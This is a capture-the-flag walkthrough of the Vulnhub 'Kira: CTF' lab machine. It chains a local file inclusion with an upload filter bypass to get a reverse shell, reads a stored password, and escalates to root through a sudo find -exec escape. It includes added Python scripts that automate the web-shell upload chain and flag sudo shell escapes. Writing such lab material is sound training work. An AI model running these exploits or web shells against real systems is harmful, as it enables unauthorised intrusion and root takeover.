
Vulnhub: KiraCTF target machine walkthrough

Date: 2022-11-26 20:22:30
Tags: 26 KiraCTF bassam 2020 usr sbin target-machine root Vulnhub

KiraCTF

Author: jason_huawen

Basic information about the target

Name: Kira: CTF

Address:

https://www.vulnhub.com/entry/kira-ctf,594/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.75.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f8:97:75      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.223  08:00:27:a6:c7:86      2     120  PCS Systemtechnik GmbH      

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.223 (the two other hosts are the VirtualBox host-only adapter and its DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.223 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 05:55 EST
Nmap scan report for localhost (192.168.56.223)
Host is up (0.000073s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A6:C7:86 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

The Nmap scan shows the target has a single open TCP port, 80 (HTTP, Apache 2.4.29 on Ubuntu), so the web application is the only attack surface.

Get Access

Visiting port 80 shows a file upload page. Testing the upload function with an image works: the file is accepted and stored under the /uploads directory.

Uploading shell.php directly is refused with the error message: File is not image

First bypass attempt: intercept the request with Burp Suite and change the part's Content-Type to image/jpeg. The same error is returned.

Second bypass attempt: prepend the GIF89a; magic bytes to shell.php. The same error is returned. Since neither the declared MIME type nor the file's magic bytes change the outcome, the check is evidently not on those; the .jpeg-extension bypass later in this write-up shows it is on the file extension.

The home page also contains a language link. Following it suggests a local file inclusion (LFI) vulnerability in the lang parameter; confirm it with a path traversal to /etc/passwd:

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
bassam:x:1000:1000:Bassam,,,:/home/bassam:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

The target does have a local file inclusion vulnerability, and the only account with a real login shell besides root is bassam. Check whether an SSH private key can be pulled down first:

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../home/bassam/.ssh/id_rsa
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

Only the page HTML came back: the later directory listing shows /home/bassam/.ssh is mode 0700 and owned by bassam, so www-data cannot read anything inside it. Since LFI exists, check for remote file inclusion as well, which would give a shell directly:

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=http://192.168.56.206:8000/test.txt         
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

Testing shows remote file inclusion is not possible; PHP ships with allow_url_include disabled, so include() refuses http:// URLs even though it accepts traversal paths.

Looking at other people's solutions, the two vulnerabilities have to be chained: the file upload and the local file inclusion.

Rename shell.php to shell2.php.jpeg so it passes the extension check, upload it, and then use the local file inclusion to include the uploaded file. include() parses its target as PHP regardless of the extension, so the "image" executes and connects back to the listener.

This yields a shell:

http://192.168.56.223/language.php?lang=../../../../../../../var/www/html/uploads/shell2.php.jpeg
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.223] 45524
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:55:20 up  1:07,  1 user,  load average: 0.06, 0.05, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bassam   :0       :0               13:47   ?xdm?  23.94s  0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swapfile  usr
www-data@bassam-aziz:/$ cd /home
cd /home
www-data@bassam-aziz:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Mar 26  2020 .
drwxr-xr-x 24 root   root   4.0K Mar 26  2020 ..
drwxr-xr-x 16 bassam bassam 4.0K Nov 26 13:48 bassam
www-data@bassam-aziz:/home$ cd bassam
cd bassam
www-data@bassam-aziz:/home/bassam$ ls -alh
ls -alh
total 116K
drwxr-xr-x 16 bassam bassam 4.0K Nov 26 13:48 .
drwxr-xr-x  3 root   root   4.0K Mar 26  2020 ..
-rw-------  1 bassam bassam 1.7K Nov 26 13:47 .ICEauthority
-rw-------  1 bassam bassam    0 Nov  4  2020 .bash_history
-rw-r--r--  1 bassam bassam  220 Mar 26  2020 .bash_logout
-rw-r--r--  1 bassam bassam 3.7K Mar 26  2020 .bashrc
drwx------ 13 bassam bassam 4.0K Mar 26  2020 .cache
drwx------ 11 bassam bassam 4.0K Mar 26  2020 .config
drwx------  3 bassam bassam 4.0K Mar 26  2020 .gnupg
drwx------  3 bassam bassam 4.0K Mar 26  2020 .local
drwx------  5 bassam bassam 4.0K Mar 26  2020 .mozilla
-rw-r--r--  1 bassam bassam  807 Mar 26  2020 .profile
-rw-r--r--  1 root   root     66 Mar 26  2020 .selected_editor
drwx------  2 bassam bassam 4.0K Mar 26  2020 .ssh
-rw-r--r--  1 bassam bassam    0 Mar 26  2020 .sudo_as_admin_successful
-rw-r-----  1 bassam bassam    5 Nov 26 13:47 .vboxclient-clipboard.pid
-rw-r-----  1 bassam bassam    5 Nov 26 13:47 .vboxclient-display.pid
-rw-r-----  1 bassam bassam    5 Nov 26 13:47 .vboxclient-draganddrop.pid
-rw-r-----  1 bassam bassam    5 Nov 26 13:47 .vboxclient-seamless.pid
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Desktop
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Documents
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Downloads
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Music
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Pictures
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Public
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Templates
drwxr-xr-x  2 bassam bassam 4.0K Mar 26  2020 Videos
-rw-r--r--  1 bassam bassam 8.8K Mar 26  2020 examples.desktop
-rw-------  1 bassam bassam   32 Nov  4  2020 user.txt
www-data@bassam-aziz:/home/bassam$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@bassam-aziz:/home/bassam$ 
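The two-step chain described above, as an added example rather than the author's own script: it builds the multipart upload for shell2.php.jpeg, checks for the "File is not image" rejection, and constructs the same include URL the write-up uses. It swaps the reverse shell for a `system($_GET['cmd'])` web shell so success can be verified from the HTTP response alone (the included file sees the request's own query string, so cmd= travels alongside lang=). The upload form field name (`fileToUpload`) and the POST endpoint (`/upload.php`, a filename seen in the /var/www/html listing further down) are assumptions; read them off the real form first.

```python
"""Added example: automate the upload + LFI chain against the Kira box.

Not part of the original post. Observed on the page: uploads of *.php are refused
with "File is not image", a .jpeg extension is accepted, files land in /uploads under
/var/www/html, and language.php?lang= includes arbitrary local paths. Assumed here:
the multipart field name FIELD and the POST endpoint ENDPOINT (the form was not
shown). The payload is a cmd= web shell instead of the write-up's reverse shell so
the result is visible in the HTTP response.
"""
import re
import secrets
import sys
import urllib.parse
import urllib.request

FIELD = "fileToUpload"      # assumption: inspect the upload form for the real name
ENDPOINT = "/upload.php"    # assumption: filename seen in /var/www/html on the page
UPLOAD_REJECTED = "File is not image"
WEB_SHELL = b"<?php system($_GET['cmd']); ?>"
ID_RE = re.compile(r"uid=(\d+)\(([^)]+)\)")


def build_multipart(field, filename, data, content_type="image/jpeg"):
    """Return (Content-Type header value, body bytes) for a one-file multipart POST.
    The filename is what an extension check sees; the part's Content-Type is the header
    the page's first, unsuccessful bypass tried to spoof."""
    boundary = "----kira" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def include_url(base, webroot, filename, cmd=None, depth=7):
    """URL that makes language.php include() the uploaded file. include() parses its
    target as PHP whatever the extension, which is why .php.jpeg runs here although
    Apache would serve it as a static (broken) image when requested directly."""
    path = "../" * depth + f"{webroot.strip('/')}/uploads/{filename}"
    url = f"{base.rstrip('/')}/language.php?lang={urllib.parse.quote(path, safe='/')}"
    if cmd is not None:
        url += "&cmd=" + urllib.parse.quote(cmd)
    return url


def parse_id(body):
    """Extract (uid, user) from `id` output embedded in a page, or None."""
    m = ID_RE.search(body)
    return (int(m.group(1)), m.group(2)) if m else None


def upload(base, filename, data):
    ctype, body = build_multipart(FIELD, filename, data)
    req = urllib.request.Request(base.rstrip("/") + ENDPOINT, data=body,
                                 headers={"Content-Type": ctype}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        text = resp.read().decode("utf-8", "replace")
    if UPLOAD_REJECTED in text:
        raise RuntimeError(f"{filename} rejected: the extension filter is still biting")
    return text


def run(base, cmd="id"):
    """Upload the web shell as shell2.php.jpeg, include it via the LFI with cmd=,
    and return (uid, user) parsed from the output. Network call."""
    upload(base, "shell2.php.jpeg", WEB_SHELL)
    url = include_url(base, "/var/www/html", "shell2.php.jpeg", cmd)
    with urllib.request.urlopen(url, timeout=10) as resp:
        return parse_id(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(run(sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.223"))
```

A successful run prints `(33, 'www-data')`, the same identity the reverse shell above reports. If the upload raises, the filter has been changed and the extension trick needs revisiting; if the include returns only the page HTML, check the web root path, which on this box is /var/www/html.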

Privilege escalation

www-data@bassam-aziz:/var/www$ cd html
cd html
www-data@bassam-aziz:/var/www/html$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 root root 4.0K Mar 26  2020 .
drwxr-xr-x 3 root root 4.0K Mar 26  2020 ..
-rw-r--r-- 1 root root  163 Mar 26  2020 index.html
-rw-r--r-- 1 root root  287 Mar 26  2020 language.php
drwxr-xr-x 2 root root 4.0K Nov  4  2020 supersecret-for-aziz
-rw-r--r-- 1 root root  747 Mar 26  2020 upload.php
drwxrwxrwx 2 root root 4.0K Nov 26 14:48 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Nov  4  2020 .
drwxr-xr-x 4 root root 4.0K Mar 26  2020 ..
-rw-r--r-- 1 root root   15 Nov  4  2020 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su - bassam
su - bassam
Password: Password123!@#

bassam@bassam-aziz:~$ id
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#

Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------  4 root root 4.0K Nov  4  2020 .
drwxr-xr-x 24 root root 4.0K Mar 26  2020 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Feb  3  2020 .cache
-rw-r--r--  1 root root   43 Nov  4  2020 flag.txt
-rw-r--r--  1 root root 1.0K Nov  4  2020 .fl.swp
drwxr-xr-x  3 root root 4.0K Mar 26  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r-----  1 root root    5 Nov 26 13:47 .vboxclient-display-svga.pid
# cat flag.txt
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}
# 

Privilege escalation successful!
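The `sudo -l` step above, turned into a small audit: an added example (not from the original post) that parses the sudoers summary and flags binaries that hand back a shell when run as root, with /usr/bin/find and its -exec escape as the case on this box. SUDO_L_OUTPUT is the text the page shows for bassam; the ESCAPES table is a short constructed list for illustration, not GTFOBins itself.

```python
"""Added example: triage `sudo -l` output for binaries that hand back a root shell.

Not part of the original write-up. SUDO_L_OUTPUT is the text the page shows for
bassam; ESCAPES is a short, hand-written table of escapes (find's -exec is the one
used on this box), illustrative rather than exhaustive. Pass --live to read the real
`sudo -n -l` output instead of the sample.
"""
import re
import subprocess
import sys

SUDO_L_OUTPUT = r"""
Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
"""

# A rule line looks like "(ALL : ALL) /usr/bin/find" or "(root) NOPASSWD: /usr/bin/vim".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")

# binary -> (why it escapes, command that does it). Constructed table, not GTFOBins.
ESCAPES = {
    "find": ("-exec runs an arbitrary command for each match",
             "sudo /usr/bin/find . -exec /bin/sh \\; -quit"),
    "vim": ("editor shell-out", "sudo vim -c ':!/bin/sh'"),
    "less": ("pager shell-out", "sudo less /etc/profile   then type  !/bin/sh"),
    "awk": ("system() builtin", "sudo awk 'BEGIN {system(\"/bin/sh\")}'"),
    "python3": ("interpreter", "sudo python3 -c 'import os; os.system(\"/bin/sh\")'"),
}


def parse_sudo_l(text):
    """Return the command rules as (runas, tags, command). Defaults lines are ignored;
    only lines after the 'may run the following commands' header are rules."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = tuple(re.findall(r"[A-Z_]+", m.group(2)))
            rules.append((m.group(1).strip(), tags, m.group(3)))
    return rules


def audit(text):
    """Flag rules whose binary is in ESCAPES. Returns (command, runas, tags, reason,
    example) tuples; a NOPASSWD tag makes a finding worse but is not needed for the
    escape, as the password-prompting find rule on this box shows."""
    findings = []
    for runas, tags, command in parse_sudo_l(text):
        binary = command.split()[0].rsplit("/", 1)[-1]
        if binary in ESCAPES:
            reason, example = ESCAPES[binary]
            findings.append((command, runas, tags, reason, example))
    return findings


if __name__ == "__main__":
    text = SUDO_L_OUTPUT
    if "--live" in sys.argv:
        text = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    findings = audit(text)
    for command, runas, tags, reason, example in findings:
        flags = " ".join(tags) or "password required"
        print(f"[!] {command} as ({runas}) [{flags}]: {reason}\n    e.g. {example}")
    if not findings:
        print("no known shell escapes in sudo rules")
```

On the sample it reports the single find rule and the exact `-exec /bin/sh \; -quit` command used above; running it with `--live` on a box you already have a shell on turns the manual GTFOBins lookup into a one-liner.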

Lessons learned

  1. The upload filter here is in fact easy to bypass: adding a .jpeg extension is enough. Requesting the uploaded file directly does not help, though. Apache only hands files whose name ends in .php to the PHP interpreter, so shell2.php.jpeg is served as a static file, the browser treats it as a (broken) image, and no shell results.

  2. Combined with the local file inclusion, the "image" (really shell.php) is passed to include(), which parses and executes whatever it is given as PHP regardless of extension, and that is what yields the shell. Rejecting uploads by extension alone, while another script includes user-controlled paths, is exactly the combination that makes each weak check fatal.

  3. Privilege escalation needed no exploit: a world-readable bassam-pass.txt under the web root gave the user's password, and a sudo rule for /usr/bin/find lets -exec spawn a root shell.

From: https://www.cnblogs.com/jason-huawen/p/16928203.html
